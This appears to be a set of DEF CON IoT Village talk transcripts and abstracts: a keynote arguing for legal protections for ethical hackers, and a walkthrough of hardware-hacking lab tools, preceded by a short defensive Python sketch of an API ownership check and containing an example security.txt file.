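The bind/unbind flaw described above comes down to a missing server-side ownership check. Here is a minimal sketch of what such an API should do before acting; the data model, names and return values are invented for illustration and are not taken from any real lock vendor's API.

```python
# Minimal sketch of the server-side ownership check the vulnerable
# bind/unbind API was missing. The data model, names and return values
# are invented for illustration.

lock_owners = {"lock-42": "alice"}

def unbind_lock(lock_id: str, caller: str) -> str:
    """Unbind a lock only when the authenticated caller owns it."""
    owner = lock_owners.get(lock_id)
    if owner is None:
        return "error: unknown lock"
    if caller != owner:
        return "error: forbidden"  # the check the vulnerable API skipped
    del lock_owners[lock_id]
    return "ok: unbound"

print(unbind_lock("lock-42", "mallory"))  # error: forbidden
print(unbind_lock("lock-42", "alice"))    # ok: unbound
```

The same pattern, verifying that the authenticated caller is authorized for the specific resource, is what would also prevent the profile-update flaw mentioned above.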
Throughout this year, we had the chance to analyze two different models of electric scooters, three different models of smart locks, various kinds of smart home devices and lastly one robot assistant which is in use at airports. During the analysis process, we found some critical security vulnerabilities including privilege escalation, insecure communication and taking over the servers on which these communications are performed. Additionally, we identified two hard-coded secret keys and one cryptographic key as a result of our analysis. In this presentation, we will be sharing the details of the vulnerabilities that we identified during our analysis.
10.5446/50721 (DOI)
Thank you so much and hi everyone. Good morning, good afternoon, good evening, wherever you are. I hope I got one of them right. So we're going to talk about how to get rights for hackers. Let's dive into it, shall we? First things first, I want to just let you guys know that this talk is completely dedicated to all the hackers who've been scared to disclose, to all the hackers who've been prosecuted for trying to do something good, and to all the people who are in the fight to bring rights for hackers. For those that don't know who I am, my name is Chloe, I am the VP of Strategy over at Point3 Security, and I'm an ethical hacker advocate. I'm basically fighting for your rights and also trying to do whatever I can to improve our hacker community. I'm the president and co-founder of WoSEC, Women of Security, and the founder of We Are Hackers, formerly known as WomenHackerz. I'm also a podcaster for ITSPmagazine's The Uncommon Journey. And when I'm not doing that, I'm also a hacker book club organizer. Basically, we read a book about the hacker community or written by someone in the hacker community; we read a new book every month, and it's every Tuesday at 5pm Pacific time when we meet. And yes, the authors and people mentioned in the books do attend. Our upcoming one is going to be Tribe of Hackers, Red Team edition, so you should come and join. That is my website, so feel free if you want to know anything about me, it's most likely on there. And yes, my Twitter and Instagram DMs are always open, so if you have questions or anything like that, feel free to DM me at any time. So we're first going to dive into the current landscape. I know this is scary, but let's dive into it together. So first things first: Equifax. I would usually say raise your hand if the Equifax breach impacted you, but let's be real. Let's just pretend. Okay.
But did you know a security researcher warned Equifax that it was vulnerable to the kind of attack that later compromised the personal data of more than 147 million Americans? This was reported by Motherboard. Six months after the researcher first notified the company about the vulnerability, Equifax patched it, but only after the massive breach that made headlines had already taken place, according to Equifax's own timeline. But the real question is: what if no one reported the breach? And it happens often, because hackers don't report a breach due to the fear of prosecution. This statistic was discovered by the hard work of Amit Elazari, who knows that our laws prevent good hackers from doing what they do best: protecting you and me and everyone we love. She has been spearheading this movement towards safe harbor, and that is her in the corner. So why are hackers scared? Well, besides prosecution, looking for contact information and reading the policies have been a burden to reporting vulnerabilities. Think about it. Sometimes when we find something we want to report, it can take hours, days, weeks. And then we get to a point like, should I even keep trying at this point to find the right contact information? To disclose is a burden on you. This is why it's important to have these vulnerability disclosure programs or bug bounty programs, because at least you feel like you have some sort of protection and you know who to contact. You know the policies, you know what's in scope and what's out of scope, ahead of time. But I want to first dive into this case. So DJI, the drone manufacturer, had recently launched a bug bounty program, and two researchers, Sean and Kevin, were basically looking at its scope. The bug bounty program covered security issues in firmware, applications and servers, including source code leaks, security workarounds and privacy issues. Now, Kevin emailed them to confirm the scope, to be safe.
It took them two weeks to finally confirm the scope. He then reported the vulnerability, and he was offered $30,000 for the finding. However, the agreement for receiving it offered no legal protection for him. So he did what most people should be doing, which is: he walked away. The revelations resulted in the company challenging the researcher's findings and seemingly threatening him with a lawsuit tied to the Computer Fraud and Abuse Act, also known as the CFAA. They claimed that basically he went out of scope, regardless of the fact that he made sure to confirm the scope. In return, he posted the entire situation, with all conversations with DJI, publicly. If you see that link, you'll be able to see his blog and what happened. I think the best part that I read on there was this moment when DJI didn't realize that when they responded to his email, there was an internal chain going on, basically saying he's putting them at risk and they should do everything possible to mitigate the risk, including lawsuits, and bad PR for them. The case did get dropped, and they did get bad PR out of this. But the language around what is in scope or out of scope when disclosing, or how to disclose, can be so scary, and the ambiguity in those documents can keep all parties awake at night. I know it has for me, and I know it probably does for you. Program managers overall are always asking to be hacked, but how to conduct themselves and handle situations when researchers report something is something that they need to work on too. But overall, organizations and governments all know it's probably needed at this time, as you can see on this slide. And I know, once again, this is a scary subject, and we're going to keep getting into the scarier parts of it. But here are some puppies to lift your spirits. And yes, there is a picture for the cat lovers as well. So if you see the cat: bravo.
And no, mine is not on here. All right. So why are they scared? Let's dive into this a little bit more. Even though ethical hackers are not malicious actors, they're still being seen and treated as such by the public. And because of this, it reduces the chance of reporting a vulnerability and can cause hackers to go to the dark side, because they're seen as the same by the public. To the left is what you see when typing in criminal hackers, and to the right is ethical hackers. Once again, there's this dark hoodie darkness, sometimes with a ski mask. But I want to also point out that it's not just the imagery. It's also the language used in the media, as in marketing and press; anytime I say media, I mean marketing and press, and the marketing could even be from infosec companies. You find this often: using the term hacker for someone who is a criminal is incorrect. They should be using the terms attacker, cybercriminal, malicious actor and so on. Unless they're reporting something good about us, then they can definitely do the hacker thing. You're probably wondering, how does this imagery and language impact us? It continues to feed the fear and stereotypes, the biases that exist through social construction. And of course, if you have attended any of my talks before, I am obsessed with the brain. So we're going to talk about the brain today. What is really important is to understand how fear works in your brain. So first of all, I want you to take a look at this. Fear is usually based around your amygdala, which is this almond-shaped structure, about the size of an almond, believe it or not, inside your brain within the temporal lobe. It is the part where your emotions are attached to memories. So for example, if you have a nightmare, you're going to recall it a little bit more, because a strong emotion was attached to it.
Versus if it's just a regular dream, you might not remember it, but you will always remember a dream that is extremely happy or extremely scary. So think of that. Anyway, the thing that you might know about the amygdala is the fight-or-flight mechanism. And what I really want to explain is that the fight-or-flight mechanism is a great way to showcase what the amygdala does. But it also is this part of you that's subconscious, and it decides who's like you and who's not like you. And based on that belief itself, you put people into categories of people to trust and people not to trust. So, for example, the amygdala, because it's tied to the memory section of your brain, is also dictating, subconsciously, whatever socially constructed beliefs you've had. And if you're wondering, what is a socially constructed belief? It's anytime when you were growing up and you had a teacher tell you that this is unsafe, your parents tell you that's not safe, or anything that you've seen in movies or TV; indirectly, it's leaving you some memory to hold onto. Now, I want to give you a better example here. I always tell people, think about it this way. You were growing up and you watched a bunch of movies as a kid, and every time someone had pink hair, they were the criminal, the villain. And not just that, but you also see on the news that people with pink hair are dangerous individuals or committing all the crimes. You read it in textbooks, you hear it from teachers; everything is showcasing that people with pink hair are dangerous. So when you see someone with pink hair at this point, you will probably clutch your bag a little bit closer, or you might cross the street, or you might actually lock your car doors when you see someone with pink hair. And I know that sounds like, but the person just has pink hair. The thing is that you have been led to believe that someone with pink hair is someone dangerous.
And that's a socially constructed belief, and the amygdala will always act on socially constructed beliefs when it comes to survival. So if it's known that someone with pink hair is dangerous, you will react accordingly. The good news, though, is that it has to be verified. The prefrontal cortex acts kind of like the CEO of the brain, and this part is completely conscious. So what happens is the amygdala sends a message saying, warning, someone with pink hair is right behind you. And then your prefrontal cortex thinks, okay, I can either cross the street, or I can go into a building, or I can clutch my bag a little bit closer, or I can look behind me to be on top of everything, or I can just ignore the threat. With the prefrontal cortex, you then decide which action to take, and it sends a message back to the amygdala to act on that action. The one thing to note is that you are completely conscious about it, and you're making that decision. And the good news is that because there's still this validation, people's biases, socially constructed beliefs, or whatnot can always be challenged. And the best way to do that is through stories, hearing people's personal stories. So for example, in the same pink hair situation: if the person with pink hair made a YouTube video talking about how terrible it is for them, because every time someone sees them, they see them as a criminal, and how that prevents them from getting a job, how that prevents them from getting where they need to go, how, for example, cops are called on them just for being outside. And how society as a whole isn't doing enough to understand that it's just that the person has pink hair. There's nothing else to it. So now, if you put on the lens of a hacker: you have probably experienced once or twice, when you tell someone you're a hacker or you work in the hacker community, that the next thing you know, they take a step back, or their mouth drops, or their eyes get bigger.
They just get afraid, because the thing is that our world has been socially constructed to see hackers as criminals, as a blanket for all hackers, instead of understanding that there's a difference between a hacker and an attacker, because they haven't learned that yet. And because our personal stories are not really out there yet, either. And that's the problem. So what happens in the hacker situation is that the mindset set by society and by people in the media is keeping us unsafe and preventing hackers from doing what they do well. Companies are afraid of hackers and don't want to create vulnerability disclosure policies because of the lack of bilateral trust among hackers, organizations, and government. It's one of the reasons why 60% do not report vulnerabilities. Hackers are scared of outdated laws such as the CFAA and DMCA. Also, from interviewing attackers, one of the reasons they decided to move away from ethical hacking is the pay and the constant worry of being prosecuted regardless of whether they did something legal. This is stated similarly by those who switched from being an attacker to a hacker: the reason they switched was the insomnia of fearing arrest, because there are cases where organizations prosecute ethical hackers regardless of whether they were in scope. Which leads us to needing to dive into the current legislation toward hackers that can be found in most countries. And this is worldwide legislation. Okay, so every country around the world has anti-hacking laws, anti-circumvention laws (also known as copyright-type laws), and acceptable use policies. So let's first dive into the Computer Fraud and Abuse Act. Every country has their own version, but the US was the first one, I think; they put it first. So let's dive into that one.
The Computer Fraud and Abuse Act is a US cybersecurity bill that was enacted in 1986 as an amendment to existing computer fraud law, which had been included in the Comprehensive Crime Control Act of 1984. The law prohibits accessing a computer without authorization, or in excess of authorization. It's also used when a researcher goes out of scope. This act is used to prosecute hacking. Random fact: who here has heard of WarGames? Okay. Did you know that Ronald Reagan watched it and freaked out about hackers, and he's like, we gotta do something? So he pushed for the CFAA to happen. Now let's dive into anti-circumvention laws, so the copyright laws. Okay, you have copyright law. Well, it's not super easy, but in the US, we have the DMCA, the Digital Millennium Copyright Act, and it was enacted in 1998. It's the US copyright law that implements two 1996 treaties of the World Intellectual Property Organization, WIPO. Basically, it affects the right to repair: reverse engineering is seen as a breach of copyright. Next, let's dive into acceptable use policies. Now, who here has ever read the terms and conditions of, say, for example, an Apple product? I tried it. I got really bored and decided to watch a movie instead. But in general, they can be long, and too much verbiage can confuse anyone, especially someone for whom English is not their first language and who is not an attorney. I'm not an attorney, by the way. But the thing is that this can lead to some serious miscommunication issues for ethical hackers who don't really speak English. Clearly, the overall takeaway on these laws is that they're old and out of date. And honestly, they were created out of fear (and you know now about fear), without empathy or taking the time to understand what is actually needed, and why the law should only prosecute malicious actors, aka criminals, and not good hackers.
Because at the time, and still to this day, a lot of legislators and politicians don't know that hackers are good people. There's a difference between a malicious actor, an attacker, a cyber criminal, and a hacker. The overall takeaway from here is that there are laws that prevent good hacking in the same way that they prevent attackers. And we need good hacking, especially during COVID-19, you guys. And I really hate the CFAA, and I want to dive a little bit further into it, just for you to know in case you don't. So the Computer Fraud and Abuse Act, once again, has grown widely outdated, in that it offers prosecutors discretion to threaten huge potential fines and jail sentences for relatively undeserving violations of computer policy. First, the CFAA as written punishes "exceeding authorized access" to a protected computer, a phrase that has gone on to inspire some broad interpretations. Another flaw in the CFAA is the redundant provisions that enable a person to be punished multiple times for the same crime. These charges can be stacked one on top of another, resulting in a threat of higher cumulative fines and jail time for the exact same violation. This also allows prosecutors to bully defendants into accepting a deal in order to avoid facing a multitude of charges from a single, solitary act. It also plays a significant role in sentencing: through the ambiguity of a provision meant to toughen sentencing for repeat offenders, the CFAA may in fact make it possible for defendants to be sentenced based on what should be prior convictions, but were nothing more than multiple convictions for the same crime. And this is why it's now important for us to talk about Aaron Swartz's case. For those that do not know Aaron Swartz's case, it basically started in 2011. Carmen Ortiz's U.S. Attorney's Office charged Swartz with hacking into the MIT computer network to download millions of scholarly articles from JSTOR.
An act of civil disobedience meant to protest the restricted access to research funded by taxpayers. For this, the U.S. Attorney brought charges that carried a maximum penalty of 35 years in prison and $1 million in fines. I want to pause there, because think about that. Thirty-five years in prison for downloading articles. You know, first-degree murder? That's not life in prison; it's actually 25 years. And yet he was facing 35. Going back to this: they were able to charge that many years because of the way the CFAA is written and the issues that have yet to be sorted out since it was made into law. But overall, looking at Aaron's situation, you have to understand what he was going through. He was dealing with a 17-month legal battle, one that had no set trial date and wasn't ending any time soon. From Swartz's perspective, it must have been so overwhelming. And it was the future of this legal battle, cast into doubt, that led Swartz to, unfortunately, hang himself in his apartment on January 11, 2013. Following his death, the federal prosecutors went on to drop the charges. His family said that the government's prosecution contributed to his decision to take his own life. In his memory, and for what he went through, there was Aaron's Law. Unfortunately, it didn't pass, probably because very heavy corporate lobbyists didn't want it to pass. But Aaron's Law would have removed the phrase "exceeds authorized access" and replaced it with "access without authorization," which is defined as obtaining information on a computer that the accesser lacks authorization to obtain, by knowingly circumventing technological or physical measures designed to prevent unauthorized individuals from obtaining that information. The other thing is that it would ensure people won't face criminal liability for violating terms of service agreements and contractual agreements. But it also limits penalties; in other words, there would be no more duplicated charges. So no more stacking on stacking, like what Aaron went through.
And with improvements to legislation, so to the CFAA and the DMCA, with these changes, then we can have what we need today. But we also need to talk about the other parts. So not only legislation; we talked about the media, the press, and whatnot. We also talked about organizations needing vulnerability disclosure programs. And I want to dive into those three categories a little bit more, because in order to have any rights or to get any public change, we have to work with three categories. In order to have rights for hackers, we need to get the public on board. And in order to do so, we need to dive into organizations, legislation, and media. We need media to push for the public to become aware. In other words, we need to change the language and imagery of a hacker and start using the term cyber criminals for those who commit unethical hacking, to really separate the two groups. To help the press, organizations need to be on board with bilateral trust, by having vulnerability disclosure programs; by showing they support hackers, the public changes their view in general. And lastly, we need organizations and public opinion to push and motivate Capitol Hill to get on board and update the current legislation so that it protects ethical hackers. Overall, we need all three to be supporting hacker rights for it to become a reality. So how do we get there, you're probably wondering? These are the five needs, and this is how we can push for awareness of ethical hackers needing rights. Now, to get there, I'm going to need your help. Overall, we need to work with the media. We need society to notice that we're everyday heroes. We need organizations to have a vulnerability disclosure program, and we need representatives to update today's legislation. But to do that, we have to change the imagery that the press is using, too.
So the first step is this petition. It's for anyone out there that supports ethical hackers and wants to bring about the change; it's the first step that I'm working on to bring attention to this matter. We have over 1,000 signatures, and honestly, it's broken down by organizations, legislators, the media, and the hacker community. And anyone who agrees with it can sign it. So you can also share it around and sign it yourself. It could be friends and family; not everyone who signs this has to be a hacker. It could be anyone who believes that we deserve rights. The second step: tell the press. Anytime you see the press reporting hackers in a bad light, correct them. Write a comment below the story, tag them in a tweet, letting them know the term is actually cyber criminal or attacker, not hacker; hackers are good people. So you need to do that. The other thing is calling them out when they use the dark hoodie imagery or the ski mask, which to my mind is still the worst thing ever. We need to do fact checks, and the way you do it, unfortunately, is you kind of have to publicly shame them till they get it right. And also, if you're someone who is interviewed by any journalist or anything like that, please make sure to keep reminding them, and let them know to use the term attacker versus hacker when reporting a breach. I've been doing that whenever I can, but it's going to take all of us, and Chris Roberts has been great doing that kind of stuff also. So push out there. Let them know they got the wrong term and the wrong imagery. Basically, everyone gets a fact check. The third step is to push for organizations to partner and campaign with us. In other words, we need companies, or even government agencies, to come out publicly saying, we stand with the ethical hackers.
It's time to change things, and to push for vulnerability disclosure programs to other companies, organizations, and so on, so they're also aware that this is a need at this point. Also, push organizations to have a disclosure program; like I just said, it's really important that we do that, because I am so tired of having to spend hours, days, and weeks to find some information on who to contact, and what's in scope and what's not in scope. This is so important. Every company should have that at this point, because they need us more than ever before. The fourth step: contact your local representatives to update current legislation. Let them know that they need to change something. Set up 10-minute appointments virtually, or try whatever you can, and work with other groups of people that want to volunteer to go and approach representatives. The ones you especially need to be focusing on are your local and state representatives, because those are the ones where we're having some serious problems. And also, last but not least, follow the Van Buren v. United States case, and there's a reason for that: in the fall, the CFAA is going to be revisited by the Supreme Court. So please take a look at it, follow it, and also contact your representatives about it. The fifth step: support wonderful groups like these, so I Am The Cavalry, disclose.io, the CERT Coordination Center (CERT/CC), the EFF, and the CTA and CTI League. It is really, really important that we work together and support one another, and that you contact them to find out how they can do better or how you can help. So, main takeaways: overall, we need to push for awareness of ethical hackers, and to let people know who we really are; our stories matter. As for how we get there, these are the main takeaways, and I'm going to need your help, and can offer advice and assistance if you want some. But most importantly, I want to remind you that the change starts with you and me. It's never too late, and we must not give up, because we must continue to fight for rights. And this is the time that we do so.
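On that disclosure-contact point, one lightweight convention an organization can adopt alongside a full vulnerability disclosure program is a security.txt file, as described in RFC 9116, served at /.well-known/security.txt, so researchers don't have to spend hours hunting for a contact and a policy link. The field names below follow the RFC; the example.com addresses and URLs are placeholders, not real endpoints:

```text
# Example file served at https://example.com/.well-known/security.txt (RFC 9116)
# Contact and Expires are required fields; the rest are optional.
Contact: mailto:security@example.com
Expires: 2026-12-31T23:59:59.000Z
Policy: https://example.com/security-policy
Preferred-Languages: en
Acknowledgments: https://example.com/hall-of-fame
```

A file like this doesn't replace a disclosure program, but it answers the two questions researchers keep losing time on: who to contact, and where the scope and legal terms live.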
I want to first say thank you to everyone at IoT Village for selecting my talk to be a keynote. I also want to thank you all for participating. So thank you all for existing. I also want to give a big shout out to Beau Woods and Harley Geiger; they helped put more ideas in my head for this conversation. Thank you guys so much, and thank you, IoT Village, once again. Thank you guys for existing, and please stay safe and enjoy the rest of your DEF CON weekend.
Sixty percent of hackers don't submit vulnerabilities due to fear rooted in out-of-date legislation, press coverage, and companies' misdirected policies. This fear is based on socially constructed beliefs. This talk dives into the brain's response to fear while focusing on increasing public awareness in order to bring about legislation that supports ethical hackers, end black hoodie and ski mask imagery, and encourage organizations to support bilateral trust within their policies.
10.5446/50722 (DOI)
in the lab, and we're going to be covering everything from kind of the basic level to the advanced level. When this thing's all over, I'm going to be jumping on the IoT Village Discord, where you'll be able to ask me more questions. Also, for everything we're going to talk about and show today, I actually have a price list. It's kind of an Amazon-type price list showing a lot of, well, not just Amazon, but various places that you can buy this stuff. That'll give you an idea; of course, if you shop around, you'll be able to get some of this stuff cheaper. So let's go ahead and talk about what our agenda is today. We've broken this up into a number of categories. Disassembly and assembly: hardware tools for taking things apart. Soldering and desoldering equipment. Magnification, which may come in handy; if you have that perfect eyesight, more power to you, but for some of us that may not have great eyesight or are getting a little older, magnification plays a big role in how we can actually see things and do soldering on surface-mount-level technology. We're going to be looking at monitoring devices and technology, and debugging tools. And then I'm going to cover probably one of the most important ones: the odds and ends, the pieces and parts that make your life much easier in a lab. And often, those pieces and parts build up within your lab as you work through the various aspects of testing things. You go, hey, if I bought this little item here, this header, this plug, this switch, it would make my life easier. So you start building up a good ensemble of those types of tech. We're going to be talking about those at the end also, which I think is very important. But let's go ahead and jump over to a screen, and let's go ahead and get a camera going in here and see how this works. Oh, that's kind of interesting. There we go. That's much better. So let me get out of the way of the camera so you all can see me.
So, again, this is kind of my lab, and we wanted to start off with looking at tools to take things apart, starting with a screwdriver set. These things are critical. I had a previous screwdriver set that did not have a box for it, and one of the things I found out is the drivers were literally laying all over the place, because I never had one good place to put them, or they ended up in a bag somewhere. So get something you can pop them in and out of, and that holds them real well. This has straight slot and Phillips tips. The other thing you want to consider is star (Torx) tips. There are a number of small devices that, when you go to take them apart, will have the star-pattern tips. So you want to take that into consideration as a big component when you're doing this. And then you can get some other small tool kits. This is one I had sitting in my bin over here, and I didn't even know I had it. It's a good breakout with some basic sockets, needle nose pliers, and some of these different heads (stars, Phillips, straight slots) a little bigger than the small ones, which may come in handy. And then also, when you start thinking about it, wrenches and different things like this; a set of cutters is always good. So you want to have a good assortment of these. Every once in a while I have a tendency to lose these things, so I end up buying more sets of them over time. Also, something to consider is a pair of good cutters. Now, I've had small wire cutters like this before, but I like these because the tips are way thicker. These things are actually great, and they come in handy not only for cutting wire. Here's an example of a bracelet-type thing, a tracker that was hermetically sealed; these came in really handy for cutting through some of the plastic. They're very durable. I've used them for removing shielding that sits over components, where I need to get access under the shielding.
So having something that can cut through metal and plastic, that's durable, and whose tip doesn't chip is pretty critical. The other thing you want to consider is spudgers. So what's a spudger? This kit (I've managed to lose half the stuff that's in it) has little fiberglass spudgers. These are pry tools that you can use for prying things open. These are all fiberglass; several of them are kind of mangled because they've been beat up pretty heavily. I also have some small, thin metal spudgers in here, and some that look like the tip of guitar picks. Those come in handy for popping open plastic cases. I also bought a kit, and this one's been really handy, that is basically metal ones. You have to be careful with these, because they can seriously hurt you if you're not careful, or do some damage to the equipment. But they come in really handy for opening certain cases, removing certain plugs or connectors, or things like that. So having a good set of spudgers is pretty good. Most of these are fairly inexpensive; $8, $9, $10 can often get you a set. I've seen some much bigger, nicer sets that run in the $20 to $30 range. But always have a set of these; they'll be very important when you're actually opening stuff up. Now the ultimate tool: what happens when you end up with a case that you can't easily clip open, you can't easily pry open? There are no screws in it. It's sealed up like a brick. I've had cases that were actually eighth-inch to three-eighths-inch-thick casings that were waterproof. What do you do? In those cases, what I like to use is a good old-fashioned Dremel tool. Now, you can get these at various prices. This one's probably the newest one I've got; my last one was cheaper. I think I paid like $35 for it, like a decade ago. I finally burnt it up and had to go out and buy another one.
And since I obviously make more money now, I went ahead and bought a better Dremel tool. If you were actually at the RSA event when we were working in the IoT Village, we had a lot of light-bulb-type tech that we were playing with, and this is what I used to cut those good old-fashioned light bulbs apart that contained the IoT-based technology. So that's kind of the general hardware-type stuff. The next thing we want to get to (this is also on the price list), before we jump into another area or start asking questions, is some of the soldering-type tools and equipment. There are a number of solutions from a soldering perspective. You can buy soldering irons at all kinds of different prices. Years ago, I used to have like three or four soldering irons that were all fixed heat levels, or fixed wattage. I think I had one that was 25 watts, one that was 45, one that was like 75, and I think I had one clear up to 100. Those worked for me back then. But as technology advanced and you start getting into surface mount devices, it becomes inherently more difficult to use those; they're a little more cumbersome. So I always recommend picking one up with variable heat, so you can change the temperature on it. And if I don't smash everything in this lab in the process... This is one you'll often see a lot of people have, and I've used this: a Hakko. I've used this one for several years, like two or three years. It's variable heat, it worked for the most part, and you can get a lot of tips for it. But as I got more advanced and into more detailed work, my biggest problem with it was heat recovery. When I went with really fine tips and I was soldering on something that was a ground, the problem I had was that this device could not keep the heat level up, and that made things harder.
And so when the heat recovery is terrible, or not really good, on a device, it causes you to spend more time on the device, more time on the chip, more time on the leg, and it leads to damage of the components; you can easily end up pulling leads and stuff like that. To keep the actual time on the device down, I actually cranked the heat of this thing all the way up, as high as it would go, and that made it possible for me to work really quick. That kind of worked for me; other people will do other things when they're dealing with this. But then I finally decided I wanted to move on. I think these are right around 100 bucks. A great product, in my opinion, for an entry-level starter, and it works pretty good. Now, there are other vendors that produce soldering equipment, and the one I went with (let me see if I can move some stuff out of the way here) is a Weller. The Weller unit, hopefully you can see it, is sitting back here. I think this is a WX1 or WX2. It actually has two soldering irons on it; when I purchased it, it came with a single soldering iron. This does, I want to say, 65 or 75 watts, somewhere around there. It's pretty good, works great. The unit is capable of pushing out 150 watts of power, so you can run two irons. I turned around and actually purchased a micro iron, and you can see this tip is really fine; you probably can't even see it on the tip of my finger. It's pretty small. This is actually brilliant; works really good. The difference is, this is a very expensive unit. I think the retail on this was like $1,200. If you get it on sale and shop around, you can probably get it down around $800 or less. So that's kind of how we want to think about soldering gear. You want to have some good soldering gear that'll actually do what you want to do: deal with surface mount devices, small components, large components, with good heat recovery. A good starting unit is the Hakko.
You can also get smaller-range Wellers that'll work pretty good. So I would shop around and ask other people with different equipment what they use. You'll find a lot of people use the Hakko, but you'll find a lot of people are fans of Weller or some of the other products. So I definitely encourage you, when you get ready to go out there: if the Hakko works for you, get it, use it. I used it for like two and a half years and I loved it; I had no problems other than the heat recovery issue. So where do we go from there? For the next area, let's go ahead and start off with some questions. So, Jonathan, are there any questions out there? Yes. So it looks like, right off the bat here, we've been talking a lot about sharp tools and hot ends on the soldering iron, things like that. One question that came up was: what kind of safety equipment do you keep on hand in your lab? And does it include things such as goggles, a first aid kit, a fire extinguisher? So I don't have a first aid kit. Well, I do have a first aid kit: it's my wife. She knows how to use 911. Hopefully she won't have to do that. But for safety equipment, there are some other things to think about. Obviously, when you're soldering, you don't want to breathe all of the nasty smoke; that's a health and safety issue. So I would recommend a fan. Here's actually a fan that you can purchase that happens to be on an articulated arm, and it works pretty good. The other thing I have in my actual lab (it's not within the picture range, but let me see if I can pull it over here) is a good old-fashioned fire extinguisher. I also have safety goggles and safety gear associated with that. So I would definitely recommend, if you set up a lab where you're going to be using hot equipment, soldering equipment, or whatever the case may be, that you be able to put out any fires that may actually show up.
Luckily, I've never had to actually use this fire extinguisher. And speaking of that same thing, it comes in handy when you start thinking about soldering gear: this particular soldering gear here, if you go away from it, shuts off after a period of time, which is nice. The Hakko does not. So, are there any other questions, or do you want to move on from here? Let me see here, taking a look at the list. I think we're okay to move on. Okay, good. So let's go ahead and jump into the next thing, and that is magnification. What kind of gear is available for actually magnifying or looking at things? I have a number of things that I use. One of them happens to be these goggles. They have adjustable eyepieces on them, and you can turn a light on. This is good for close-up looking, but you have to hold the item up close, so you can't really do any soldering with them; they come in handy for quick examination of devices. One of the other things I have in here (I haven't used it in a while, but I used to use it quite a bit) is a pin camera. This is a USB pin camera that I can shine into things; it goes into smaller places, and it works pretty good. I also have a borescope, an endoscope that can actually be put through small holes so you can see inside things. That one's kind of packed away right now. The other equipment that I have, and you may have seen this if you've been to the IoT Village where Rapid7 is working, is a device that comes in pretty handy: a small bench camera with a screen. You can magnify with it; it has variable settings, you can focus it, and you can also hook a USB cable up to it and feed it into a TV. In this particular case, I went ahead and covered this one with rubber. The purpose of the rubber is to protect it, so I can actually put energized equipment on here and look at it also. Some of the other equipment I have: this is another USB microscope, and there are so many on the market.
You know, which one's better than another? Gosh, that's kind of a hard one. You can spend anywhere from 20 or 30 bucks up to $300 or $400 for one of these. I've seen ones that go clear to 5,000x, which was absolutely amazing; you could actually see the runs on a silicon chip with it. But that's, again, very high end. When we get into something bigger, something you want to solder under, the more expensive solution is right here, which is a microscope. This is a great microscope; this one does everything from 3x, I believe, all the way up to 90x, has a mounted camera on it, and a variable focal length. You can actually slide it in and out, which makes it really handy for this type of magnification work, and I do a lot of surface-mount device work underneath it. I've used it for reballing BGAs and stuff like that. But this is an expensive unit, and they vary in price as you go up in caliber. Like I said, this one is 90x, and it's about a $600 unit. But if we move away from that and ask what somebody who's entry level, or right above entry level, should look for in a good scope, here's one I used for a number of years, and I loved it. This is an AmScope. This one will do 10 to 20x power at a fixed focal length. This device cost about $185, and it is a brilliant piece of equipment. I have several of these that I've used in various trainings in the past. I would recommend, if you're looking for a scope and you don't have the big money, look at something like that. Look at AmScope and what they have to offer from a price point. I think this model was $185, and it worked like a champ; again, I used it for a number of years. But then I got greedy and wanted something super cool, so I went ahead and bought this one for work in my lab. So what else can we dig into here?
I think some of the most important things we want to talk about in the area of soldering are the other supplies you may need for actual soldering. Let me go ahead and switch out the screen so we can dig into some of this stuff a little closer, then we'll pop back to the other screen, because we can show this stuff a little better here. From the solder standpoint, there are a number of different brands out there, and this particular brand is six of one, half a dozen of the other. But I would get the small stuff; this one here happens to be 0.3 millimeter. I use leaded solder. I hate lead-free solder. Some people may like it; I think it's horrible to work with, and I think leaded works much better in every case I've ever dealt with. You also want to get solder wick. Solder wick comes in really handy for removing and cleaning solder off the board. But when you're thinking about removing solder, and you want to dig in and remove surface-mount devices, the ultimate solution for removing surface-mount devices easily, in my opinion, is this product right here. If you have not used this Chip Quik surface-mount device removal kit, you're missing out. This will make life much easier. It comes with a flux, so you put the flux on, and then it comes with what looks like solder. This is not solder; it's way more brittle. It's a low-temperature alloy, and what it'll do is absorb the solder and keep the temperature down low. So let's say you're trying to remove a TSOP-48, which is a typical 48-pin memory chip that is soldered down by all 48 pins. It's kind of hard to keep 48 pins melted. But with this stuff, once you put it on there, you can easily spread it across each one of the leads, glob it on there pretty good, and it'll stay melted so you can lift the chip completely off the device.
It's a true lifesaver. So let's move on. Any questions? Do we have any questions from the audience, Jonathan?

Looks like the question list is empty here. One quick thing that did come up: you mentioned earlier you're going to provide a parts list, but one high-level question. Most of the parts you've just mentioned, such as the Chip Quik and solder, do you generally purchase those through, say, SparkFun or through Amazon? Again, knowing that you're going to provide the parts list, just a high-level question.

Yeah, typically when I buy this stuff, I'll be honest with you, everyone, I'm kind of lazy. I'm an Amazon kind of guy. I can usually turn stuff around quickly, and a lot of times Amazon has stuff available sooner. So if Amazon has it available within 24 to 48 hours, I'm going to pay that little extra and have it sent to me quickly. But you can go off and buy this stuff from a number of vendors and organizations that sell these types of products: hacker groups, hacker organizations, technology organizations, AliExpress. For a lot of the stuff you're going to see today, you can easily just order it and have it shipped straight from China. But again, I have a tendency to be a little lazy, and when I want it, I want it now. I don't want to wait a week for it, because if I think I need it, I need it now. That's usually how I go with Amazon. So you'll see a lot of the links on here going off to Amazon or Weller or some of the other equipment manufacturers, buying it that way. Okay, so let's move on. The next area we want to look at is monitoring equipment. Thinking about monitoring equipment: how do we gain access to circuit boards, and how do we start looking at data? One of the first things is the USB-to-serial component.
And I think a lot of people online are probably familiar with these. These are reasonably inexpensive. This is a Bus Pirate, and it will give you that level of access to start looking at devices. That said, I'm not a big fan of using it that way; I have a tendency to use these differently. There's other software you can install on them to turn them into debuggers for Atmel chips. So if you need to debug or read data off an Atmel chip, you can easily take one of these and put, I think it's the STK500 v2 software, on it. I showed this last year at the IoT Village in hands-on exercises that were using reprogrammed Bus Pirates. So that's pretty good. The other thing, and I'm a fan of these, I have a whole box of them sitting around here, is the little Shikra. The Shikra has a lot of capabilities, and here's the little data sheet that comes with it. We have UART, we have JTAG (you can use OpenOCD with that), and you can use SPI for reading memory off chips. This device comes in really handy. I typically use it for UART, and like I said, I love this device quite a bit. Then there are other FTDI devices that can be used; here are just a couple I have in my lab that I purchased for other purposes and reasons. And then there's another one I bought not too long ago, I guess about three or four months ago, that actually has four UARTs built into it. So it is USB, it has four UARTs, and you can switch between 3.3 volts and 5 volts. You can either hook up here or hook into the actual project. It's nice: you plug it in and four UART interfaces show up. This makes it much easier to hook into multiple connection points on a device for doing UART testing or analysis.
